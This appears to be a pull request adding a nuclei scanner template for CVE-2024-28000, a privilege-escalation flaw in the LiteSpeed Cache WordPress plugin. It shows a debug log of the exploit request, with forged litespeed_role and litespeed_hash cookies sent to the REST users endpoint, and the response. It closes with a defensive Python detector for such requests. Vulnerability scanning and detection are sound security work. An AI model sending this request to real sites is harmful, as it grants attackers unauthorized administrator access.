/claim #13222
Incorrect Privilege Assignment vulnerability in LiteSpeed Technologies LiteSpeed Cache litespeed-cache allows Privilege Escalation.
This issue affects LiteSpeed Cache: from 1.9 through 6.3.0.1.
ID: CVE-2024-28000
Severity: critical
Variable required: litespeed_hash (supplied with -var litespeed_hash=HASH).
nuclei -t CVE-2024-28000.yaml -u https://target-site.com -var litespeed_hash=HASH
I’ve validated this template locally?
Name: LiteSpeed Cache
Version: 6.3.0.1
nuclei -t ./test2.yaml -u http://192.168.1.10:8888/ -var litespeed_hash="jdeR85" -debug
[WRN] Found 22 template[s] loaded with deprecated paths, update before v3 for continued support.
[INF] Current nuclei version: v3.4.10 (latest)
[INF] Current nuclei-templates version: v10.2.8 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 114
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[INF] [CVE-2024-28000] Dumped HTTP request for http://192.168.1.10:8888/wp-json/wp/v2/users
GET /wp-json/wp/v2/users HTTP/1.1
Host: 192.168.1.10:8888
User-Agent: Mozilla/5.0 (Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Cookie: litespeed_role=1; litespeed_hash=jdeR85
Accept-Encoding: gzip
[DBG] [CVE-2024-28000] Dumped HTTP response http://192.168.1.10:8888/wp-json/wp/v2/users
HTTP/1.1 200 OK
Connection: close
Content-Length: 1501
Access-Control-Allow-Headers: Authorization, X-WP-Nonce, Content-Disposition, Content-MD5, Content-Type
Access-Control-Expose-Headers: X-WP-Total, X-WP-TotalPages, Link
Allow: GET, POST
Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private
Content-Type: application/json; charset=UTF-8
Date: Mon, 15 Sep 2025 03:10:55 GMT
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Link: <http://localhost:8888/wp-json/>; rel="https://api.w.org/"
Server: Apache/2.4.65 (Debian)
X-Content-Type-Options: nosniff
X-Litespeed-Tag: fc6_tag_priv,public:fc6_HTTP.200
X-Powered-By: PHP/8.2.29
X-Robots-Tag: noindex
X-Wp-Total: 2
X-Wp-Totalpages: 1
[{"id":1,"name":"admin","url":"http:\/\/localhost:8888","description":"","link":"http:\/\/localhost:8888\/author\/admin\/","slug":"admin","avatar_urls":{"24":"https:\/\/secure.gravatar.com\/avatar\/5edfa2692bdacc5e6ee805c626c50cb44cebb065f092d9a1067d89f74dacd326?s=24&d=mm&r=g","48":"https:\/\/secure.gravatar.com\/avatar\/5edfa2692bdacc5e6ee805c626c50cb44cebb065f092d9a1067d89f74dacd326?s=48&d=mm&r=g","96":"https:\/\/secure.gravatar.com\/avatar\/5edfa2692bdacc5e6ee805c626c50cb44cebb065f092d9a1067d89f74dacd326?s=96&d=mm&r=g"},"meta":[],"_links":{"self":[{"href":"http:\/\/localhost:8888\/wp-json\/wp\/v2\/users\/1","targetHints":{"allow":["GET","POST","PUT","PATCH","DELETE"]}}],"collection":[{"href":"http:\/\/localhost:8888\/wp-json\/wp\/v2\/users"}]}},{"id":2,"name":"nuclei-a","url":"","description":"","link":"http:\/\/localhost:8888\/author\/nuclei-a\/","slug":"nuclei-a","avatar_urls":{"24":"https:\/\/secure.gravatar.com\/avatar\/21a0f83ea74911a98a543e9e9f73508aa37b2b87e9dbe840e6ec796f217bab76?s=24&d=mm&r=g","48":"https:\/\/secure.gravatar.com\/avatar\/21a0f83ea74911a98a543e9e9f73508aa37b2b87e9dbe840e6ec796f217bab76?s=48&d=mm&r=g","96":"https:\/\/secure.gravatar.com\/avatar\/21a0f83ea74911a98a543e9e9f73508aa37b2b87e9dbe840e6ec796f217bab76?s=96&d=mm&r=g"},"meta":[],"_links":{"self":[{"href":"http:\/\/localhost:8888\/wp-json\/wp\/v2\/users\/2","targetHints":{"allow":["GET","POST","PUT","PATCH","DELETE"]}}],"collection":[{"href":"http:\/\/localhost:8888\/wp-json\/wp\/v2\/users"}]}}]
[CVE-2024-28000:status-1] [http] [critical] http://192.168.1.10:8888/wp-json/wp/v2/users
[CVE-2024-28000:regex-2] [http] [critical] http://192.168.1.10:8888/wp-json/wp/v2/users
[CVE-2024-28000:word-3] [http] [critical] http://192.168.1.10:8888/wp-json/wp/v2/users
[INF] Scan completed in 145.2397ms. 3 matches found.
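The request dump above shows the cookie pair the template sends (litespeed_role plus the supplied litespeed_hash) against the REST users endpoint. As an added defender-side example, not part of this PR or the template, the script below flags such requests in captured request dumps; it assumes blank-line-separated raw HTTP request dumps as input (the format of nuclei's -debug output), and the sample dumps it contains are constructed.

```python
"""Flag requests carrying LiteSpeed Cache's litespeed_role / litespeed_hash cookies
(the pair the dump above sends to /wp-json/wp/v2/users). Added example, not part of
the PR; input is blank-line-separated raw request dumps and the samples are constructed."""
import re
from http.cookies import SimpleCookie
from typing import Optional

# REST users endpoint the template probes (collection or a single user id).
REST_USERS = re.compile(r"^/wp-json/wp/v2/users(?:/\d+)?(?:\?.*)?$")

SAMPLE_DUMPS = """GET /wp-json/wp/v2/users HTTP/1.1
Host: 192.168.1.10:8888
Cookie: litespeed_role=1; litespeed_hash=jdeR85

GET /wp-admin/ HTTP/1.1
Host: 192.168.1.10:8888
Cookie: wordpress_logged_in_abc=admin%7Cexample

GET /wp-json/ HTTP/1.1
Host: 192.168.1.10:8888
Cookie: litespeed_role=1
"""

def parse_request(dump: str) -> dict:
    """Split one raw request dump into method, path and lower-cased headers."""
    lines = dump.strip().splitlines()
    method, path, _ = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "headers": headers}

def assess(req: dict) -> Optional[dict]:
    """Return a finding when a litespeed_role cookie is present: a normal browser
    session does not send it, and pairing it with the users endpoint raises severity."""
    jar = SimpleCookie()
    jar.load(req["headers"].get("cookie", ""))
    role = jar.get("litespeed_role")
    if role is None:
        return None
    return {"path": req["path"], "litespeed_role": role.value,
            "has_hash": "litespeed_hash" in jar,
            "severity": "high" if REST_USERS.match(req["path"]) else "medium"}

def scan(dumps: str) -> list:
    """Assess every non-empty dump and keep only the findings."""
    results = [assess(parse_request(d)) for d in dumps.split("\n\n") if d.strip()]
    return [f for f in results if f]
```

Feed it a proxy or WAF request capture in the same dump format to surface every client presenting the crawler cookies to the REST API.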
Participants: hoanpk912 (@hoanpk912), ProjectDiscovery (@projectdiscovery)